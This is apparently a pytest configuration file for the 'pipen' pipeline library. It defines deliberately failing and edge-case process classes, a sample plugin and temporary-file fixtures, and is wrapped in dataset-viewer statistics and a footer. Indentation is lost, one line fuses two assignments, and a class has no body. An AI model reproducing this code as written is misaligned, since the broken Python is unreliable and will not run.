@pytest.fixture
def infile2(tmp_path):
out = tmp_path / "infile2"
out.write_text("in2")
return out
def create_dead_link(path):
target = Path(gettempdir()) / "__NoSuchFile__"
target.write_text("")
link = Path(path)
if link.exists() or link.is_symlink():
link.unlink()
link.symlink_to(target)
target.unlink()
| 20.70354
| 89
| 0.617226
|
import sys
import signal
from tempfile import gettempdir
from pathlib import Path
from shutil import rmtree
from multiprocessing import Process
import pytest
from pipen import Proc, Pipen, plugin
class SimpleProc(Proc):
input = ["input"]
class NormalProc(Proc):
input = "input:var"
output = ["output:{{in.input}}"]
script = "echo {{in.input}}"
class In2Out1Proc(Proc):
input = "in1:var, in2:var"
output = "out:var:{{in.in1}}_{{in.in2}}"
script = "echo {{in.in1}} {{in.in2}}"
class RelPathScriptProc(Proc):
input = "in"
output = "out:var:{{in.in}}"
script = "file://__init__.py"
class ScriptNotExistsProc(Proc):
input = "in"
output = "out:var:{{in.in}}"
script = "file:///no/such/file"
class ErrorProc(Proc):
input = ["input"]
script = "exit 1"
class ScriptRenderErrorProc(Proc):
input = "a"
output = "b:var:1"
script = "{{c(d)}}"
class SleepingProc(Proc):
input = "time"
script = "sleep {{in.time}}"
class RetryProc(ErrorProc):
input = "starttime"
error_strategy = "retry"
num_retries = 10
lang = sys.executable script = "import sys, time; sys.exit(1 if time.time() < {{in.starttime}} + 3 else 0)"
class OutputRenderErrorProc(Proc):
input = "a"
output = "b:var:{{c(d)}}"
class OutputNoNameErrorProc(Proc):
input = "a"
output = "b"
class OutputWrongTypeProc(Proc):
input = "a"
output = "b:c:d"
class OutputAbsPathProc(Proc):
input = "a"
output = "b:file:/a/b"
class NoInputProc(Proc):
class InputTypeUnsupportedProc(Proc):
input = "input:unsupported:1"
class FileInputProc(Proc):
input = "in:file"
output = "out:file:{{in.in.split('/')[-1]}}"
script = "cat {{in.in}} > {{out.out}}"
class OutputNotGeneratedProc(Proc):
input = "in"
output = "out:file:{{in.in}}"
script = "echo {{in.in}}"
class FileInputsProc(Proc):
input = "in:files"
output = "out:file:{{in.in[0].split('/')[-1]}}"
script = "echo {{in.in}} > {{out.out}}"
class MixedInputProc(Proc):
input = "invar:var, infile:file"
output = "outfile:file:{{in.invar}}"
script = "echo {{in.invar}} > {{out.outfile}}"
class DirOutputProc(Proc):
input = "in"
output = "outfile:dir:outdir"
script = "echo {{in.in}} > {{out.outfile}}/outfile; "
class SimplePlugin:
@plugin.impl
async def on_init(pipen):
print("SimplePlugin")
@pytest.fixture
def pipen(tmp_path):
index = Pipen.PIPELINE_COUNT + 1
pipen_simple = Pipen(
name=f"simple_pipeline_{index}",
desc="No description",
loglevel="debug",
cache=True,
workdir=tmp_path / ".pipen",
outdir=tmp_path / f"pipen_simple_{index}",
)
return pipen_simple
@pytest.fixture
def pipen_with_plugin(tmp_path):
index = Pipen.PIPELINE_COUNT + 1
pipen_simple = Pipen(
name=f"simple_pipeline_{index}",
desc="No description",
loglevel="debug",
cache=True,
plugins=[SimplePlugin()],
workdir=tmp_path / ".pipen",
outdir=tmp_path / f"pipen_simple_{index}",
)
return pipen_simple
@pytest.fixture
def infile(tmp_path):
out = tmp_path / "infile"
out.write_text("in")
return out
@pytest.fixture
def infile1(tmp_path):
out = tmp_path / "infile1"
out.write_text("in1")
return out
@pytest.fixture
def infile2(tmp_path):
out = tmp_path / "infile2"
out.write_text("in2")
return out
def create_dead_link(path):
target = Path(gettempdir()) / "__NoSuchFile__"
target.write_text("")
link = Path(path)
if link.exists() or link.is_symlink():
link.unlink()
link.symlink_to(target)
target.unlink()
| true
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.